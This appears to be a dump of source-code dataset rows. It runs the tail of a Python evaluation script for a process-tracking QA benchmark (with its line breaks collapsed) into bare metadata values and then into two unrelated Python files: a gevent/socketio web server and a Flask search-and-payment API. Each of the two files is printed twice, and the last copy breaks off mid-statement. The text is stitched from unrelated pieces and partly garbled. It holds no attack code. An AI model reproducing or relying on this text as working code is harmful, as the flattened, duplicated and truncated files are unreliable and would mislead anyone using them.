+= (TurkerQuestionLabel(sid, participant, event_type, from_location, to_location)) return ret #---------------------------------------------------------------------------------------------------------------- def readPredictions(fnPred): ret = {} for ln in open(fnPred): f = ln.rstrip().split('\t') pid, sid, participant, from_location, to_location = int(f[0]), int(f[1]), f[2], f[3], f[4] if pid not in ret: ret[pid] = {} dtPartPred = ret[pid] if participant not in dtPartPred: dtPartPred[participant] = {} dtPartPred[participant][sid] = PredictionRecord(pid, sid, participant, from_location, to_location) return ret #---------------------------------------------------------------------------------------------------------------- def readGold(fn): # read the gold label dtPar = {} for ln in open(fn): f = ln.rstrip().split('\t') parId, sentId, participant, before_after, labels = int(f[0]), int(f[1]), f[2], f[3], f[4:] if (before_after != "before") and (before_after != "after"): print("Error:", ln) sys.exit(-1) if sentId == 1 and before_after == "before": statusId = 0 elif before_after == "before": continue # skip this line else: statusId = sentId if parId not in dtPar: dtPar[parId] = {} dtPartLab = dtPar[parId] if participant not in dtPartLab: dtPartLab[participant] = {statusId: labels} else: dtPartLab[participant][statusId] = labels return dtPar #---------------------------------------------------------------------------------------------------------------- def findAllParticipants(lstTurkerLabels): setParticipants = set() for turkerLabels in lstTurkerLabels: for x in turkerLabels: setParticipants.add(x.participant) return setParticipants def findCreationStep(prediction_records): steps = sorted(prediction_records, key=lambda x: x.sid) #print("steps:", steps) # first step if steps[0].from_location != 'null': # not created (exists before the process) return -1 for s in steps: if s.to_location != 'null': return s.sid return -1 # never exists def findDestroyStep(prediction_records): steps = sorted(prediction_records, key=lambda x: x.sid, reverse=True) #print("steps:", steps) # last step if steps[0].to_location != 'null': # not destroyed (exists after the process) return -1 for s in steps: if s.from_location != 'null': return s.sid return -1 # never exists def location_match(p_loc, g_loc): if p_loc == g_loc: return True p_string = ' %s ' % ' '.join([stem(x) for x in p_loc.lower().replace('"','').split()]) g_string = ' %s ' % ' '.join([stem(x) for x in g_loc.lower().replace('"','').split()]) if p_string in g_string: #print ("%s === %s" % (p_loc, g_loc)) return True return False def findMoveSteps(prediction_records): ret = [] steps = sorted(prediction_records, key=lambda x: x.sid) # print(steps) for s in steps: if s.from_location != 'null' and s.to_location != 'null' and s.from_location != s.to_location: ret.append(s.sid) return ret #---------------------------------------------------------------------------------------------------------------- # Q1: Is participant X created during the process? def Q1(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions be_created = {} for participant in setParticipants: pred_creation_step = findCreationStep(predictions[pid][participant].values()) be_created[participant] = (pred_creation_step != -1) for turkerLabels in labels[pid]: # labeled as created participants lab_created_participants = [x.participant for x in turkerLabels if x.event_type == 'create'] for participant in setParticipants: tp += int(be_created[participant] and (participant in lab_created_participants)) fp += int(be_created[participant] and (participant not in lab_created_participants)) tn += int(not be_created[participant] and (participant not in lab_created_participants)) fn += int(not be_created[participant] and (participant in lab_created_participants)) return tp,fp,tn,fn # Q2: Participant X is created during the process. At which step is it created? def Q2(labels, predictions): tp = fp = tn = fn = 0.0 # find all created participants and their creation step for pid,lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'create']: pred_creation_step = findCreationStep(predictions[pid][x.participant].values()) tp += int(pred_creation_step != -1 and pred_creation_step == x.sid) fp += int(pred_creation_step != -1 and pred_creation_step != x.sid) fn += int(pred_creation_step == -1) return tp,fp,tn,fn # Q3: Participant X is created at step Y, and the initial location is known. Where is the participant after it is created? def Q3(labels, predictions): tp = fp = tn = fn = 0.0 # find all created participants and their creation step for pid,lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'create' and x.to_location != 'unk']: pred_loc = predictions[pid][x.participant][x.sid].to_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.to_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.to_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp, fp, tn, fn #---------------------------------------------------------------------------------------------------------------- # Q4: Is participant X destroyed during the process? def Q4(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions be_destroyed = {} for participant in setParticipants: pred_destroy_step = findDestroyStep(predictions[pid][participant].values()) be_destroyed[participant] = (pred_destroy_step != -1) for turkerLabels in labels[pid]: # labeled as destroyed participants lab_destroyed_participants = [x.participant for x in turkerLabels if x.event_type == 'destroy'] for participant in setParticipants: tp += int(be_destroyed[participant] and (participant in lab_destroyed_participants)) fp += int(be_destroyed[participant] and (participant not in lab_destroyed_participants)) tn += int(not be_destroyed[participant] and (participant not in lab_destroyed_participants)) fn += int(not be_destroyed[participant] and (participant in lab_destroyed_participants)) return tp,fp,tn,fn # Q5: Participant X is destroyed during the process. At which step is it destroyed? def Q5(labels, predictions): tp = fp = tn = fn = 0.0 # find all destroyed participants and their destroy step for pid, lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'destroy']: pred_destroy_step = findDestroyStep(predictions[pid][x.participant].values()) tp += int(pred_destroy_step != -1 and pred_destroy_step == x.sid) fp += int(pred_destroy_step != -1 and pred_destroy_step != x.sid) fn += int(pred_destroy_step == -1) return tp,fp,tn,fn # Q6: Participant X is destroyed at step Y, and its location before destroyed is known. Where is the participant right before it is destroyed? def Q6(labels, predictions): tp = fp = tn = fn = 0.0 # find all created participants and their destroy step for pid,lstTurkerLabels in labels.items(): for turkerLabels in lstTurkerLabels: for x in [x for x in turkerLabels if x.event_type == 'destroy' and x.from_location != 'unk']: pred_loc = predictions[pid][x.participant][x.sid].from_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.from_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.from_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp, fp, tn, fn #---------------------------------------------------------------------------------------------------------------- # Q7 Does participant X move during the process? def Q7(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions be_moved = {} for participant in setParticipants: pred_move_steps = findMoveSteps(predictions[pid][participant].values()) be_moved[participant] = (pred_move_steps != []) # print(be_moved) for turkerLabels in labels[pid]: lab_moved_participants = [x.participant for x in turkerLabels if x.event_type == 'move'] for participant in setParticipants: tp += int(be_moved[participant] and (participant in lab_moved_participants)) fp += int(be_moved[participant] and (participant not in lab_moved_participants)) tn += int(not be_moved[participant] and (participant not in lab_moved_participants)) fn += int(not be_moved[participant] and (participant in lab_moved_participants)) return tp,fp,tn,fn # Q8 Participant X moves during the process. At which steps does it move? def Q8(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: setParticipants = findAllParticipants(labels[pid]) # find predictions pred_moved_steps = {} for participant in setParticipants: pred_moved_steps[participant] = findMoveSteps(predictions[pid][participant].values()) num_steps = len(predictions[pid][participant].keys()) for turkerLabels in labels[pid]: gold_moved_steps = {} for x in [x for x in turkerLabels if x.event_type == 'move']: if x.participant not in gold_moved_steps: gold_moved_steps[x.participant] = [] gold_moved_steps[x.participant].append(x.sid) for participant in gold_moved_steps: res = set_compare(pred_moved_steps[participant], gold_moved_steps[participant], num_steps) tp += res[0] fp += res[1] tn += res[2] fn += res[3] return tp,fp,tn,fn def set_compare(pred_steps, gold_steps, num_steps): setPred = set(pred_steps) setGold = set(gold_steps) tp = len(setPred.intersection(setGold)) fp = len(setPred - setGold) fn = len(setGold - setPred) tn = num_steps - tp - fp - fn return (tp, fp, tn, fn) # Q9 Participant X moves at step Y, and its location before step Y is known. What is its location before step Y? def Q9(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: for turkerLabels in labels[pid]: for x in turkerLabels: if x.event_type == 'move' and x.from_location != 'unk': pred_loc = predictions[pid][x.participant][x.sid].from_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.from_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.from_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp,fp,tn,fn # Q10 Participant X moves at step Y, and its location after step Y is known. What is its location after step Y? def Q10(labels, predictions): tp = fp = tn = fn = 0.0 for pid in labels: for turkerLabels in labels[pid]: for x in turkerLabels: if x.event_type == 'move' and x.to_location != 'unk': pred_loc = predictions[pid][x.participant][x.sid].to_location tp += int(pred_loc != 'null' and pred_loc != 'unk' and location_match(pred_loc, x.to_location)) fp += int(pred_loc != 'null' and pred_loc != 'unk' and not location_match(pred_loc, x.to_location)) fn += int(pred_loc == 'null' or pred_loc == 'unk') return tp,fp,tn,fn #---------------------------------------------------------------------------------------------------------------- def main(): if len(sys.argv) != 4: sys.stderr.write("Usage: evalQA.py para-ids gold-labels system-predictions\n") sys.exit(-1) paraIds = sys.argv[1] goldPred = sys.argv[2] fnPred = sys.argv[3] qid_to_score = {} selPid = set([int(x) for x in open(paraIds).readlines()]) gold_labels = readGold(goldPred) labels = readLabels('tests/fixtures/eval/all-moves.full-grid.tsv', selPid, gold_labels) predictions = readPredictions(fnPred) blHeader = True qid = 0 for Q in [Q1, Q2, Q3, Q4, Q5, Q6, Q7, Q8, Q9, Q10]: qid += 1 tp, fp, tn, fn = Q(labels, predictions) header,results_str, results = metrics(tp,fp,tn,fn,qid) if blHeader: print("\t%s" % header) blHeader = False print("Q%d\t%s" % (qid, results_str)) qid_to_score[qid] = results[5] cat1_score = (qid_to_score[1] + qid_to_score[4] + qid_to_score[7]) / 3 cat2_score = (qid_to_score[2] + qid_to_score[5] + qid_to_score[8]) / 3 cat3_score = (qid_to_score[3] + qid_to_score[6] + qid_to_score[9] + qid_to_score[10]) / 4 macro_avg = (cat1_score + cat2_score + cat3_score) / 3 num_cat1_q = 750 num_cat2_q = 601 num_cat3_q = 823 micro_avg = ((cat1_score * num_cat1_q) + (cat2_score * num_cat2_q) + (cat3_score * num_cat3_q)) / \ (num_cat1_q + num_cat2_q + num_cat3_q) print("\n\nCategory\tAccuracy Score") print("=========\t=====") print(f"Cat-1\t\t{round(cat1_score,2)}") print(f"Cat-2\t\t{round(cat2_score,2)}") print(f"Cat-3\t\t{round(cat3_score,2)}") print(f"macro-avg\t{round(macro_avg,2)}") print(f"micro-avg\t{round(micro_avg,2)}") def metrics(tp, fp, tn, fn, qid): if (tp+fp > 0): prec = tp/(tp+fp) else: prec = 0.0 if (tp+fn > 0): rec = tp/(tp+fn) else: rec = 0.0 if (prec + rec) != 0: f1 = 2 * prec * rec / (prec + rec) else: f1 = 0.0 accuracy = (tp+tn) / (tp + fp + tn + fn) if qid == 8: accuracy = f1 # this is because Q8 can have multiple valid answers and F1 makes more sense here total = tp + fp + tn + fn header = '\t'.join(["Total", "TP", "FP", "TN", "FN", "Accuracy", "Precision", "Recall", "F1"]) results = [total, tp, fp, tn, fn, accuracy*100, prec*100, rec*100, f1*100] results_str = "%d\t%d\t%d\t%d\t%d\t%.2f\t%.2f\t%.2f\t%.2f" % (total, tp, fp, tn, fn, accuracy*100, prec*100, rec*100, f1*100) return (header, results_str, results) #---------------------------------------------------------------------------------------------------------------- if __name__ == "__main__": main()
16,649
0
541
deae37deb80e55431aeffc4a40f5e13cb6af2f86
2,360
py
Python
peerlyApp/peerlyWS.py
z4m0/peerly
187275822dcb6f35cc798c277ec43287e778a049
[ "MIT" ]
null
null
null
peerlyApp/peerlyWS.py
z4m0/peerly
187275822dcb6f35cc798c277ec43287e778a049
[ "MIT" ]
null
null
null
peerlyApp/peerlyWS.py
z4m0/peerly
187275822dcb6f35cc798c277ec43287e778a049
[ "MIT" ]
null
null
null
from gevent import monkey; monkey.patch_all() import gevent from socketio import socketio_manage from socketio.server import SocketIOServer from socketio.namespace import BaseNamespace from socketio.mixins import RoomsMixin, BroadcastMixin from twisted.internet import reactor, task, defer from twisted.python import log from peerlyDB.network import Server import sys, signal from p2p import P2PNamespace log.startLogging(sys.stdout)
27.764706
71
0.587288
from gevent import monkey; monkey.patch_all() import gevent from socketio import socketio_manage from socketio.server import SocketIOServer from socketio.namespace import BaseNamespace from socketio.mixins import RoomsMixin, BroadcastMixin from twisted.internet import reactor, task, defer from twisted.python import log from peerlyDB.network import Server import sys, signal from p2p import P2PNamespace log.startLogging(sys.stdout) class Application(object): def __init__(self, port=8469): self.buffer = [] # Dummy request object to maintain state between Namespace # initialization. server = Server() server.listen(port) self.request = { 'queries': {}, 'kadServer' : server, 'inserts' : {}, 'port' : port, 'bootstraped' : False } gevent.spawn(self.startReactor) def startReactor(self): gevent.sleep(1) reactor.run() signal.signal(signal.SIGINT, signal.default_int_handler) def __call__(self, environ, start_response): path = environ['PATH_INFO'].strip('/') if not path: start_response('200 OK', [('Content-Type', 'text/html')]) return [open('peerlyApp/web/peerly.html').read()] #return ['<h1>Welcome. ' # 'Try the <a href="/chat.html">chat</a> example.</h1>'] if path.startswith('static/') or path == 'peerly.html': try: data = open('peerlyApp/web/'+path).read() except Exception: return not_found(start_response) if path.endswith(".js"): content_type = "text/javascript" elif path.endswith(".css"): content_type = "text/css" elif path.endswith(".swf"): content_type = "application/x-shockwave-flash" else: content_type = "text/html" start_response('200 OK', [('Content-Type', content_type)]) return [data] if path.startswith("socket.io"): socketio_manage(environ, {'': P2PNamespace}, self.request) else: return not_found(start_response) def not_found(start_response): start_response('404 Not Found', []) return ['<h1>Not Found</h1>']
1,774
5
127
9134aff78215faf06e32eb3662c9a17d4dfcc14c
13,671
py
Python
ppr-api/src/ppr_api/resources/searches.py
cameron-freshworks/ppr
01d6f5d300c791aebad5e58bb4601e9be2ccfc46
[ "Apache-2.0" ]
null
null
null
ppr-api/src/ppr_api/resources/searches.py
cameron-freshworks/ppr
01d6f5d300c791aebad5e58bb4601e9be2ccfc46
[ "Apache-2.0" ]
null
null
null
ppr-api/src/ppr_api/resources/searches.py
cameron-freshworks/ppr
01d6f5d300c791aebad5e58bb4601e9be2ccfc46
[ "Apache-2.0" ]
null
null
null
# Copyright © 2019 Province of British Columbia # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """API endpoints for executing PPR searches.""" # pylint: disable=too-many-return-statements from http import HTTPStatus from flask import current_app, g, jsonify, request from flask_restx import Namespace, Resource, cors from registry_schemas import utils as schema_utils from ppr_api.exceptions import BusinessException, DatabaseException from ppr_api.models import SearchRequest, SearchResult from ppr_api.resources import utils as resource_utils from ppr_api.services.authz import authorized, is_bcol_help, is_gov_account, is_sbc_office_account, is_staff_account from ppr_api.services.payment import TransactionTypes from ppr_api.services.payment.exceptions import SBCPaymentException from ppr_api.services.payment.payment import Payment from ppr_api.utils.auth import jwt from ppr_api.utils.util import cors_preflight API = Namespace('searches', description='Endpoints for PPR searches.') VAL_ERROR = 'Search request data validation errors.' # Validation error prefix SAVE_ERROR_MESSAGE = 'Account {0} search db save failed: {1}' PAY_REFUND_MESSAGE = 'Account {0} search refunding payment for invoice {1}.' PAY_REFUND_ERROR = 'Account {0} search payment refund failed for invoice {1}: {2}.' # Map api spec search type to payment transaction details description TO_SEARCH_TYPE_DESCRIPTION = { 'AIRCRAFT_DOT': 'Aircraft Airframe DOT Number:', 'BUSINESS_DEBTOR': 'Debtor Business Name:', 'INDIVIDUAL_DEBTOR': 'Debtor Individual Name:', 'MHR_NUMBER': 'Manufactured Home Registration Number:', 'REGISTRATION_NUMBER': 'Registration Number:', 'SERIAL_NUMBER': 'Serial/VIN Number:' } CERTIFIED_PARAM = 'certified' ROUTING_SLIP_PARAM = 'routingSlipNumber' DAT_NUMBER_PARAM = 'datNumber' BCOL_NUMBER_PARAM = 'bcolAccountNumber' @cors_preflight('POST,OPTIONS') @API.route('', methods=['POST', 'OPTIONS']) class SearchResource(Resource): """Resource for executing PPR searches.""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def post(): # pylint: disable=too-many-branches,too-many-locals """Execute a new search request using criteria in the request body.""" try: # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if not account_id: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate request against the schema. valid_format, errors = schema_utils.validate(request_json, 'searchQuery', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) # Perform any extra data validation such as start and end dates here SearchRequest.validate_query(request_json) # Staff has special payment rules and setup. if is_staff_account(account_id) or is_bcol_help(account_id): return staff_search(request, request_json, account_id) query = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', None)) # Charge a search fee. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) transaction_type = TransactionTypes.SEARCH.value # if gov account user then check if sbc if is_gov_account(jwt): # if SBC staff user (authy, api call) then change transaction type to $10 fee is_sbc = is_sbc_office_account(jwt.get_token_auth_header(), account_id) if is_sbc: transaction_type = TransactionTypes.SEARCH_STAFF.value elif is_sbc is None: # didn't get a succesful response from auth raise BusinessException('Unable to verify possible SBC staff user before payment.', HTTPStatus.INTERNAL_SERVER_ERROR) pay_ref = payment.create_payment(transaction_type, 1, None, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: # noqa: B902; handle all db related errors. current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED except SBCPaymentException as pay_exception: return resource_utils.pay_exception_response(pay_exception, account_id) except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) @cors_preflight('PUT,OPTIONS') @API.route('/<path:search_id>', methods=['PUT', 'OPTIONS']) class SearchDetailResource(Resource): """Resource for processing requests to update the search selection (UI autosave).""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def put(search_id): """Execute a search selection update request replacing the current value with the request body contents.""" try: if search_id is None: return resource_utils.path_param_error_response('search ID') # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if account_id is None: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate schema. valid_format, errors = schema_utils.validate(request_json, 'searchSummary', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) search_request = SearchRequest.find_by_id(search_id) if not search_request: return resource_utils.not_found_error_response('searchId', search_id) # Save the updated search selection. search_request.update_search_selection(request_json) return jsonify(search_request.updated_selection), HTTPStatus.ACCEPTED except DatabaseException as db_exception: return resource_utils.db_exception_response(db_exception, account_id, 'PUT search selection update') except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) def staff_search(req: request, request_json, account_id: str): """Execute a staff search with special payment validation and methods.""" payment_info = build_staff_payment(req, account_id) # bcol help is no fee; reg staff can be no fee. # FAS is routing slip only. # BCOL is dat number (optional) and BCOL account number (mandatory). # All staff roles including SBC can submit no fee searches. if ROUTING_SLIP_PARAM in payment_info and BCOL_NUMBER_PARAM in payment_info: return resource_utils.staff_payment_bcol_fas() if CERTIFIED_PARAM in payment_info: request_json['certified'] = True query: SearchRequest = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', None)) # Always create a payment transaction. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) # staff payment pay_ref = payment.create_payment_staff_search(payment_info, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: # noqa: B902; handle all db related errors. current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED def build_staff_payment(req: request, account_id: str): """Extract payment information from request parameters.""" payment_info = { 'transactionType': TransactionTypes.SEARCH_STAFF_NO_FEE.value } if is_bcol_help(account_id): return payment_info certified = req.args.get(CERTIFIED_PARAM) routing_slip = req.args.get(ROUTING_SLIP_PARAM) bcol_number = req.args.get(BCOL_NUMBER_PARAM) dat_number = req.args.get(DAT_NUMBER_PARAM) if certified is not None and isinstance(certified, bool) and certified: payment_info[CERTIFIED_PARAM] = True elif certified is not None and isinstance(certified, str) and \ certified.lower() in ['true', '1', 'y', 'yes']: payment_info[CERTIFIED_PARAM] = True if routing_slip is not None: payment_info[ROUTING_SLIP_PARAM] = str(routing_slip) if bcol_number is not None: payment_info[BCOL_NUMBER_PARAM] = str(bcol_number) if dat_number is not None: payment_info[DAT_NUMBER_PARAM] = str(dat_number) if ROUTING_SLIP_PARAM in payment_info or BCOL_NUMBER_PARAM in payment_info: if CERTIFIED_PARAM in payment_info: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED.value else: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF.value elif CERTIFIED_PARAM in payment_info: # Verify this is allowed. payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED_NO_FEE.value return payment_info def get_payment_details(search_request, search_type): """Extract the payment details value from the search request criteria.""" details = { 'label': TO_SEARCH_TYPE_DESCRIPTION[search_type] } if search_request.search_type == SearchRequest.SearchTypes.BUSINESS_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['business'] elif search_request.search_type == SearchRequest.SearchTypes.INDIVIDUAL_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['last'] + ', ' +\ search_request.search_criteria['criteria']['debtorName']['first'] else: details['value'] = search_request.search_criteria['criteria']['value'] return details
47.634146
116
0.684661
# Copyright © 2019 Province of British Columbia # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """API endpoints for executing PPR searches.""" # pylint: disable=too-many-return-statements from http import HTTPStatus from flask import current_app, g, jsonify, request from flask_restx import Namespace, Resource, cors from registry_schemas import utils as schema_utils from ppr_api.exceptions import BusinessException, DatabaseException from ppr_api.models import SearchRequest, SearchResult from ppr_api.resources import utils as resource_utils from ppr_api.services.authz import authorized, is_bcol_help, is_gov_account, is_sbc_office_account, is_staff_account from ppr_api.services.payment import TransactionTypes from ppr_api.services.payment.exceptions import SBCPaymentException from ppr_api.services.payment.payment import Payment from ppr_api.utils.auth import jwt from ppr_api.utils.util import cors_preflight API = Namespace('searches', description='Endpoints for PPR searches.') VAL_ERROR = 'Search request data validation errors.' # Validation error prefix SAVE_ERROR_MESSAGE = 'Account {0} search db save failed: {1}' PAY_REFUND_MESSAGE = 'Account {0} search refunding payment for invoice {1}.' PAY_REFUND_ERROR = 'Account {0} search payment refund failed for invoice {1}: {2}.' # Map api spec search type to payment transaction details description TO_SEARCH_TYPE_DESCRIPTION = { 'AIRCRAFT_DOT': 'Aircraft Airframe DOT Number:', 'BUSINESS_DEBTOR': 'Debtor Business Name:', 'INDIVIDUAL_DEBTOR': 'Debtor Individual Name:', 'MHR_NUMBER': 'Manufactured Home Registration Number:', 'REGISTRATION_NUMBER': 'Registration Number:', 'SERIAL_NUMBER': 'Serial/VIN Number:' } CERTIFIED_PARAM = 'certified' ROUTING_SLIP_PARAM = 'routingSlipNumber' DAT_NUMBER_PARAM = 'datNumber' BCOL_NUMBER_PARAM = 'bcolAccountNumber' @cors_preflight('POST,OPTIONS') @API.route('', methods=['POST', 'OPTIONS']) class SearchResource(Resource): """Resource for executing PPR searches.""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def post(): # pylint: disable=too-many-branches,too-many-locals """Execute a new search request using criteria in the request body.""" try: # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if not account_id: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate request against the schema. valid_format, errors = schema_utils.validate(request_json, 'searchQuery', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) # Perform any extra data validation such as start and end dates here SearchRequest.validate_query(request_json) # Staff has special payment rules and setup. if is_staff_account(account_id) or is_bcol_help(account_id): return staff_search(request, request_json, account_id) query = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', None)) # Charge a search fee. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) transaction_type = TransactionTypes.SEARCH.value # if gov account user then check if sbc if is_gov_account(jwt): # if SBC staff user (authy, api call) then change transaction type to $10 fee is_sbc = is_sbc_office_account(jwt.get_token_auth_header(), account_id) if is_sbc: transaction_type = TransactionTypes.SEARCH_STAFF.value elif is_sbc is None: # didn't get a succesful response from auth raise BusinessException('Unable to verify possible SBC staff user before payment.', HTTPStatus.INTERNAL_SERVER_ERROR) pay_ref = payment.create_payment(transaction_type, 1, None, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: # noqa: B902; handle all db related errors. current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED except SBCPaymentException as pay_exception: return resource_utils.pay_exception_response(pay_exception, account_id) except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) @cors_preflight('PUT,OPTIONS') @API.route('/<path:search_id>', methods=['PUT', 'OPTIONS']) class SearchDetailResource(Resource): """Resource for processing requests to update the search selection (UI autosave).""" @staticmethod # @TRACER.trace() @cors.crossdomain(origin='*') @jwt.requires_auth def put(search_id): """Execute a search selection update request replacing the current value with the request body contents.""" try: if search_id is None: return resource_utils.path_param_error_response('search ID') # Quick check: must be staff or provide an account ID. account_id = resource_utils.get_account_id(request) if account_id is None: return resource_utils.account_required_response() # Verify request JWT and account ID if not authorized(account_id, jwt): return resource_utils.unauthorized_error_response(account_id) request_json = request.get_json(silent=True) # Validate schema. valid_format, errors = schema_utils.validate(request_json, 'searchSummary', 'ppr') if not valid_format: return resource_utils.validation_error_response(errors, VAL_ERROR) search_request = SearchRequest.find_by_id(search_id) if not search_request: return resource_utils.not_found_error_response('searchId', search_id) # Save the updated search selection. search_request.update_search_selection(request_json) return jsonify(search_request.updated_selection), HTTPStatus.ACCEPTED except DatabaseException as db_exception: return resource_utils.db_exception_response(db_exception, account_id, 'PUT search selection update') except BusinessException as exception: return resource_utils.business_exception_response(exception) except Exception as default_exception: # noqa: B902; return nicer default error return resource_utils.default_exception_response(default_exception) def staff_search(req: request, request_json, account_id: str): """Execute a staff search with special payment validation and methods.""" payment_info = build_staff_payment(req, account_id) # bcol help is no fee; reg staff can be no fee. # FAS is routing slip only. # BCOL is dat number (optional) and BCOL account number (mandatory). # All staff roles including SBC can submit no fee searches. if ROUTING_SLIP_PARAM in payment_info and BCOL_NUMBER_PARAM in payment_info: return resource_utils.staff_payment_bcol_fas() if CERTIFIED_PARAM in payment_info: request_json['certified'] = True query: SearchRequest = SearchRequest.create_from_json(request_json, account_id, g.jwt_oidc_token_info.get('username', None)) # Always create a payment transaction. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) # staff payment pay_ref = payment.create_payment_staff_search(payment_info, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: 